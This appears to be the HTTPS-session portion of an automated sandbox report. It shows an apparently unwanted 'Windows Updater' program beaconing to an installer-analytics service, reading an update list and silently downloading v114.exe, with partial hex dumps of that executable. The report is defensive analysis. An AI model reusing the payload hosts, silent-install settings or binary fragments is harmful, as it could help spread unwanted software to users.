                                                                                                                                                                                                                                                                        2023-12-06 13:33:28 UTC16384INData Raw: 3f aa 61 74 b7 30 29 bd fc 8f f1 93 14 f9 93 cd 07 36 68 b9 db a4 2e 3a 74 a5 cd 56 de f9 99 1a 20 1c 79 93 8a 50 08 02 87 5b e0 0c 1c 14 b5 9b 3d 7d 70 db 27 bc b6 64 23 36 43 e0 81 cc ac 91 5b 43 1e 0a da 4b 05 22 bb 21 38 91 79 b9 84 fa 51 a1 05 f5 e2 c1 b0 f6 15 9b a9 f4 fc d9 fd fb 33 06 b0 58 85 65 38 0b 4d a4 4f 49 72 10 c2 b8 15 53 d0 0d 57 a9 7d 40 54 a4 89 6f 39 0f b2 c6 29 ef 78 0a a0 cd b1 32 83 02 d8 70 dc 77 d4 c7 93 22 8c 03 45 cf e6 6e 3c c2 c2 f2 8c f9 34 1e c9 0a 23 f2 d5 0e a2 7a 9d d7 eb 72 80 b7 06 06 5c 42 81 f5 ce b5 fb 4c 06 c0 9d 65 b8 0a 87 c3 64 ac f6 55 13 75 8c 77 d2 8a f6 e1 92 7f 01 0e 6b 27 69 87 34 cb 01 38 b3 39 ec 82 38 6c fa da 4e 9b 1f 50 6a de cc 48 89 5b b9 63 c5 a6 b3 32 97 44 01 23 7b d1 f1 1e 2a 19 8a 47 1b 4e e4
                                                                                                                                                                                                                                                                        Data Ascii: ?at0)6h.:tV yP[=}p'd#6C[CK"!8yQ3Xe8MOIrSW}@To9)x2pw"En<4#zr\BLedUuwk'i4898lNPjH[c2D#{*GN
                                                                                                                                                                                                                                                                        2023-12-06 13:33:28 UTC362INData Raw: 6b 19 3a 2a 2c 92 87 be 77 e6 90 99 62 e2 96 2d 1e 2a 29 4a f1 36 6f 79 28 23 20 5f 47 2e b4 bb 52 b8 6b ed 83 1e c4 49 87 62 d1 57 6b 07 b8 21 1c e0 06 3c 2b 01 bd 27 3e be 92 3a 97 96 f8 a3 ef f6 bc f1 96 8d fa a5 e1 70 de 3f 33 0b 5d ab 96 ef ec 7d a3 eb d8 68 78 29 1e e0 35 cc 4f 93 2e cc 64 1d d1 2a 52 a6 bb af 0d 5f aa d9 14 4e a9 3b ab 03 65 1c 06 e8 f1 ff 58 04 1d 57 a2 0a 0e 56 1c 1b 80 57 1d 24 ad ee 62 23 d4 24 fa c1 13 a8 fe 07 16 46 55 28 e1 a6 9c 41 20 74 e6 fb ce 00 40 e8 33 ad d1 71 f2 f9 dc 51 3c 6c 28 96 a7 01 d8 b7 5d 40 6a 84 ce c7 6c 40 ff ab a1 d3 83 81 15 47 ee ab a7 55 55 20 1d 81 20 83 07 03 15 d8 3c d8 38 3f 7e cc a4 c8 c7 cf 8f 67 3b bb bb 83 8b 7c a0 f2 37 4b 31 89 12 1f ec ee 52 81 44 8a 3e 61 f0 6d c9 6f a4 91 b6 ed 16 e9 af
                                                                                                                                                                                                                                                                        Data Ascii: k:*,wb-*)J6oy(# _G.RkIbWk!<+'>:p?3]}hx)5O.d*R_N;eXWVW$b#$FU(A t@3qQ<l(]@jl@GUU <8?~g;|7K1RD>amo


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        12192.168.2.55012754.165.38.2324436972C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:41 UTC241OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                                                                                                        User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                                                                                                                                                                                                                                        Host: collect.installeranalytics.com
                                                                                                                                                                                                                                                                        Content-Length: 165
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2023-12-06 13:33:41 UTC165OUTData Raw: 71 74 3d 36 38 32 34 38 31 32 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 35 37 62 65 63 37 39 35 31 35 63 31 65 63 35 32 35 66 38 38 35 38 62 66 26 61 76 3d 31 2e 30 2e 30 26 63 69 64 3d 35 37 46 31 41 42 38 39 32 39 46 45 37 32 42 39 45 44 37 39 46 34 35 39 30 43 39 38 42 32 37 44 34 43 30 36 46 42 38 44 26 73 69 64 3d 25 37 42 31 32 37 33 39 33 44 45 2d 39 39 37 42 2d 34 46 45 42 2d 41 37 32 31 2d 43 44 36 30 46 35 35 32 31 32 37 33 25 37 44
                                                                                                                                                                                                                                                                        Data Ascii: qt=6824812&t=lifecycle&lc=start&v=3&aid=57bec79515c1ec525f8858bf&av=1.0.0&cid=57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D&sid=%7B127393DE-997B-4FEB-A721-CD60F5521273%7D
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC638INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 32 20 50 61 79 6d 65 6e 74 20 52 65 71 75 69 72 65 64 0d 0a 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 3d 22 73 65 74 2d 63 6f 6f 6b 69 65 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 34 32 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 32 2d 76 79 47 70 36 50 76 46 6f 34 52 76 73 46 74 50 6f 49 57 65 43 52 65 79 49 43 38 22 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 41 57 53 45 4c 42 3d 32 39 33 39 39 33 36 46 31 30 32 37 30 44 31 43 43 39 38 32 31 39 36 34 39 39 31 34 30 33 44 38 45 42 33 36 33 44 36 33 44 45
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 402 Payment RequiredCache-control: no-cache="set-cookie"Content-Type: application/json; charset=utf-8Date: Wed, 06 Dec 2023 13:33:42 GMTETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"Set-Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DE
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                        Data Ascii: {}


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        13192.168.2.550128104.21.74.1094435572C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC147OUTGET /updates.txt HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: AdvancedInstaller
                                                                                                                                                                                                                                                                        Host: allroadslimit.com
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC651INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 32 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 31 31 20 4d 61 79 20 32 30 32 32 20 30 34 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 32 37 62 34 32 62 35 2d 33 39 38 22 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Wed, 06 Dec 2023 13:33:42 GMTContent-Type: text/plainContent-Length: 920Connection: closeLast-Modified: Wed, 11 May 2022 04:59:33 GMTETag: "627b42b5-398"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoi
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC718INData Raw: 3b 61 69 75 3b 0a 0a 5b 76 31 31 34 5d 0a 4e 61 6d 65 20 3d 20 57 69 6e 64 6f 77 73 20 49 6e 73 74 61 6c 6c 65 72 0a 4e 6f 47 55 49 43 6f 6d 6d 61 6e 64 4c 69 6e 65 53 77 69 74 63 68 20 3d 20 2f 65 78 65 6e 6f 75 69 20 2f 71 6e 0a 50 72 6f 64 75 63 74 56 65 72 73 69 6f 6e 20 3d 20 35 2e 30 2e 34 2e 30 0a 55 52 4c 20 3d 20 68 74 74 70 73 3a 2f 2f 64 6c 2e 6c 69 6b 65 61 73 75 72 66 65 72 2e 63 6f 6d 2f 75 70 64 61 74 65 73 2f 76 31 31 34 2e 65 78 65 0a 53 69 7a 65 20 3d 20 34 39 30 30 36 38 30 0a 53 48 41 32 35 36 20 3d 20 42 30 45 30 41 43 38 33 44 35 30 39 30 43 33 35 39 46 38 34 41 46 31 36 30 41 45 42 41 39 42 42 37 33 31 37 44 36 44 36 34 33 37 32 45 34 44 45 45 39 38 30 43 37 44 43 32 33 46 45 46 45 34 31 0a 4d 44 35 20 3d 20 35 64 63 36 34 34 65 30
                                                                                                                                                                                                                                                                        Data Ascii: ;aiu;[v114]Name = Windows InstallerNoGUICommandLineSwitch = /exenoui /qnProductVersion = 5.0.4.0URL = https://dl.likeasurfer.com/updates/v114.exeSize = 4900680SHA256 = B0E0AC83D5090C359F84AF160AEBA9BB7317D6D64372E4DEE980C7DC23FEFE41MD5 = 5dc644e0
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC202INData Raw: 31 31 33 2e 65 78 65 0a 46 6c 61 67 73 20 3d 20 53 69 6c 65 6e 74 49 6e 73 74 61 6c 6c 7c 4e 6f 43 61 63 68 65 7c 41 64 76 65 72 74 69 73 65 73 0a 52 65 67 69 73 74 72 79 4b 65 79 20 3d 20 48 4b 55 44 5c 53 6f 66 74 77 61 72 65 5c 41 64 76 61 6e 63 65 64 57 69 6e 64 6f 77 73 4d 61 6e 61 67 65 72 5c 57 69 6e 64 6f 77 73 20 49 6e 73 74 61 6c 6c 65 72 5c 56 65 72 73 69 6f 6e 0a 56 65 72 73 69 6f 6e 20 3d 20 35 2e 30 2e 33 2e 30 0a 41 75 74 6f 43 6c 6f 73 65 41 70 70 6c 69 63 61 74 69 6f 6e 20 3d 20 5b 41 50 50 44 49 52 5d 41 64 76 61 6e 63 65 64 57 69 6e 64 6f 77 73 4d 61 6e 61 67 65 72 2e 65 78 65 0a
                                                                                                                                                                                                                                                                        Data Ascii: 113.exeFlags = SilentInstall|NoCache|AdvertisesRegistryKey = HKUD\Software\AdvancedWindowsManager\Windows Installer\VersionVersion = 5.0.3.0AutoCloseApplication = [APPDIR]AdvancedWindowsManager.exe


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        14192.168.2.55012954.165.38.2324436972C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC547OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                                                                                                        User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                                                                                                                                                                                                                                        Host: collect.installeranalytics.com
                                                                                                                                                                                                                                                                        Content-Length: 165
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DE10DBFD7E5D4AE6378040B3BE1E956BB85D656C9DA50AE59FEBEDA15106E5CAD558E0D4A27909ADF5545C2768DD9F758E; AWSELBCORS=2939936F10270D1CC9821964991403D8EB363D63DE10DBFD7E5D4AE6378040B3BE1E956BB85D656C9DA50AE59FEBEDA15106E5CAD558E0D4A27909ADF5545C2768DD9F758E
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC165OUTData Raw: 71 74 3d 36 38 32 35 37 35 30 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 35 37 62 65 63 37 39 35 31 35 63 31 65 63 35 32 35 66 38 38 35 38 62 66 26 61 76 3d 31 2e 30 2e 30 26 63 69 64 3d 35 37 46 31 41 42 38 39 32 39 46 45 37 32 42 39 45 44 37 39 46 34 35 39 30 43 39 38 42 32 37 44 34 43 30 36 46 42 38 44 26 73 69 64 3d 25 37 42 42 31 38 31 34 46 31 43 2d 35 42 42 41 2d 34 32 38 44 2d 42 43 41 45 2d 42 36 43 43 41 33 32 45 35 45 34 41 25 37 44
                                                                                                                                                                                                                                                                        Data Ascii: qt=6825750&t=lifecycle&lc=start&v=3&aid=57bec79515c1ec525f8858bf&av=1.0.0&cid=57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D&sid=%7BB1814F1C-5BBA-428D-BCAE-B6CCA32E5E4A%7D
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC219INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 32 20 50 61 79 6d 65 6e 74 20 52 65 71 75 69 72 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 34 32 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 32 2d 76 79 47 70 36 50 76 46 6f 34 52 76 73 46 74 50 6f 49 57 65 43 52 65 79 49 43 38 22 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 402 Payment RequiredContent-Type: application/json; charset=utf-8Date: Wed, 06 Dec 2023 13:33:42 GMTETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"X-Powered-By: ExpressContent-Length: 2Connection: Close
                                                                                                                                                                                                                                                                        2023-12-06 13:33:42 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                        Data Ascii: {}


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        15192.168.2.55013154.165.38.2324437588C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:43 UTC547OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                                                                                                        User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                                                                                                                                                                                                                                        Host: collect.installeranalytics.com
                                                                                                                                                                                                                                                                        Content-Length: 174
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DE10DBFD7E5D4AE6378040B3BE1E956BB85D656C9DA50AE59FEBEDA15106E5CAD558E0D4A27909ADF5545C2768DD9F758E; AWSELBCORS=2939936F10270D1CC9821964991403D8EB363D63DE10DBFD7E5D4AE6378040B3BE1E956BB85D656C9DA50AE59FEBEDA15106E5CAD558E0D4A27909ADF5545C2768DD9F758E
                                                                                                                                                                                                                                                                        2023-12-06 13:33:43 UTC174OUTData Raw: 71 74 3d 36 38 32 36 33 39 30 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 65 6e 64 26 6c 73 3d 73 75 63 63 65 73 73 26 76 3d 33 26 61 69 64 3d 35 37 62 65 63 37 39 35 31 35 63 31 65 63 35 32 35 66 38 38 35 38 62 66 26 61 76 3d 31 2e 30 2e 30 26 63 69 64 3d 35 37 46 31 41 42 38 39 32 39 46 45 37 32 42 39 45 44 37 39 46 34 35 39 30 43 39 38 42 32 37 44 34 43 30 36 46 42 38 44 26 73 69 64 3d 25 37 42 31 32 37 33 39 33 44 45 2d 39 39 37 42 2d 34 46 45 42 2d 41 37 32 31 2d 43 44 36 30 46 35 35 32 31 32 37 33 25 37 44
                                                                                                                                                                                                                                                                        Data Ascii: qt=6826390&t=lifecycle&lc=end&ls=success&v=3&aid=57bec79515c1ec525f8858bf&av=1.0.0&cid=57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D&sid=%7B127393DE-997B-4FEB-A721-CD60F5521273%7D
                                                                                                                                                                                                                                                                        2023-12-06 13:33:43 UTC219INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 32 20 50 61 79 6d 65 6e 74 20 52 65 71 75 69 72 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 34 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 32 2d 76 79 47 70 36 50 76 46 6f 34 52 76 73 46 74 50 6f 49 57 65 43 52 65 79 49 43 38 22 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 402 Payment RequiredContent-Type: application/json; charset=utf-8Date: Wed, 06 Dec 2023 13:33:43 GMTETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"X-Powered-By: ExpressContent-Length: 2Connection: Close
                                                                                                                                                                                                                                                                        2023-12-06 13:33:43 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                        Data Ascii: {}


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        16192.168.2.550134104.21.32.1004436304C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC153OUTGET /updates/v114.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: AdvancedInstaller
                                                                                                                                                                                                                                                                        Host: dl.likeasurfer.com
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC692INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 33 3a 34 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 39 30 30 36 38 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 31 31 20 4d 61 79 20 32 30 32 32 20 30 35 3a 30 32 3a 34 31 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 32 37 62 34 33 37 31 2d 34 61 63 37 34 38 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a
                                                                                                                                                                                                                                                                        Data Ascii: HTTP/1.1 200 OKDate: Wed, 06 Dec 2023 13:33:47 GMTContent-Type: application/octet-streamContent-Length: 4900680Connection: closeLast-Modified: Wed, 11 May 2022 05:02:41 GMTETag: "627b4371-4ac748"Cache-Control: max-age=14400CF-Cache-Status:
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC677INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d6 e7 ac 00 92 86 c2 53 92 86 c2 53 92 86 c2 53 41 f4 c1 52 9f 86 c2 53 41 f4 c7 52 2b 86 c2 53 41 f4 c4 52 93 86 c2 53 f0 fe c6 52 81 86 c2 53 f0 fe c1 52 8a 86 c2 53 f0 fe c7 52 fa 86 c2 53 41 f4 c6 52 88 86 c2 53 41 f4 c3 52 91 86 c2 53 41 f4 c5 52 93 86 c2 53 92 86 c3 53 4f 84 c2 53 12 ff cb 52 df 87 c2 53 12 ff 3d 53 93 86 c2 53 92 86 55 53 93 86 c2 53 12 ff c0 52 93 86 c2
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSARSAR+SARSRSRSRSARSARSARSSOSRS=SSUSSR
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC1369INData Raw: 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 5b 02 00 00 80 2d 00 00 5c 02 00 00 44 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: @@.reloc[-\D-@B
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC1369INData Raw: 0a 8d 85 38 ff ff ff c7 85 30 ff ff ff f4 b9 62 00 c6 85 34 ff ff ff 01 89 85 68 fe ff ff c7 85 5c ff ff ff 00 00 00 00 c6 45 fc 0d 8d 85 68 ff ff ff c7 85 60 ff ff ff 10 ba 62 00 c6 85 64 ff ff ff 00 89 85 64 fe ff ff c7 45 8c 00 00 00 00 c6 45 fc 11 8d 45 98 c7 45 90 34 ba 62 00 c6 45 94 00 89 85 60 fe ff ff c7 45 bc 00 00 00 00 c6 45 fc 15 8d 85 78 fe ff ff 89 85 5c fe ff ff c7 85 9c fe ff ff 00 00 00 00 c6 45 fc 16 c7 85 78 fe ff ff d0 ba 62 00 89 85 9c fe ff ff c6 45 fc 17 8d 45 c8 c7 45 c0 00 00 00 00 c6 45 c4 00 89 85 58 fe ff ff c7 45 ec 00 00 00 00 c6 45 fc 18 8b 8d 9c fe ff ff 85 c9 74 35 8b 01 8d 55 c8 52 8b 40 04 ff d0 8b 8d 9c fe ff ff 89 45 ec 85 c9 74 1d 8b 01 8b 50 10 8d 85 78 fe ff ff 3b c8 0f 95 c0 50 ff d2 c7 85 9c fe ff ff 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: 80b4h\Eh`bddEEEE4bE`EEx\ExbEEEEXEEt5UR@EtPx;P
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC1369INData Raw: ff 15 d8 94 6a 00 68 80 ad 61 00 a3 58 b0 6a 00 e8 8e 7d 19 00 59 c3 cc cc 68 02 7f 00 00 6a 00 ff 15 d8 94 6a 00 68 b0 ad 61 00 a3 5c b0 6a 00 e8 6e 7d 19 00 59 c3 cc cc 55 8b ec 6a ff 68 14 10 5c 00 64 a1 00 00 00 00 50 81 ec b0 00 00 00 a1 24 30 6a 00 33 c5 89 45 f0 50 8d 45 f4 64 a3 00 00 00 00 6a 09 ba a0 73 62 00 8d 8d 48 ff ff ff e8 a3 58 00 00 c7 45 fc 00 00 00 00 ba b4 73 62 00 6a 09 8d 8d 60 ff ff ff e8 8a 58 00 00 c6 45 fc 01 ba c8 73 62 00 6a 09 8d 8d 78 ff ff ff e8 74 58 00 00 c6 45 fc 02 ba dc 73 62 00 6a 09 8d 4d 90 e8 61 58 00 00 c6 45 fc 03 ba f0 73 62 00 6a 09 8d 4d a8 e8 4e 58 00 00 c6 45 fc 04 ba 04 74 62 00 6a 05 8d 4d c0 e8 3b 58 00 00 c6 45 fc 05 ba 10 74 62 00 6a 04 8d 4d d8 e8 28 58 00 00 c7 45 fc 06 00 00 00 83 c4 18 8d 45 f0 8d
                                                                                                                                                                                                                                                                        Data Ascii: jhaXj}Yhjjha\jn}YUjh\dP$0j3EPEdjsbHXEsbj`XEsbjxtXEsbjMaXEsbjMNXEtbjM;XEtbjM(XEE
                                                                                                                                                                                                                                                                        2023-12-06 13:33:47 UTC1369INData Raw: c4 18 8d 45 f0 8d 8d 48 ff ff ff 50 51 b9 90 b0 6a 00 e8 59 46 00 00 c7 45 fc ff ff ff ff 8d 85 48 ff ff ff 68 60 79 40 00 6a 07 6a 18 50 e8 c6 74 19 00 68 e0 ae 61 00 e8 0d 78 19 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 8b 4d f0 33 cd e8 35 74 19 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 81 ec c8 00 00 00 a1 24 30 6a 00 33 c4 89 84 24 c4 00 00 00 8d 0c 24 c7 04 24 60 2e 63 00 51 8d 84 24 c4 00 00 00 c7 44 24 08 00 00 00 00 50 51 b9 9c b0 6a 00 c7 44 24 14 00 00 00 00 c7 44 24 18 90 2e 63 00 c7 44 24 1c 00 00 00 00 c7 44 24 20 00 00 00 00 c7 44 24 24 14 23 63 00 c7 44 24 28 01 00 00 00 c7 44 24 2c 00 00 00 00 c7 44 24 30 c0 2e 63 00 c7 44 24 34 01 00 00 00 c7 44 24 38 00 00 00 00 c7 44 24 3c
                                                                                                                                                                                                                                                                        Data Ascii: EHPQjYFEHh`y@jjPthaxMdYM35t]U$0j3$$$`.cQ$D$PQjD$D$.cD$D$ D$$#cD$(D$,D$0.cD$4D$8D$<
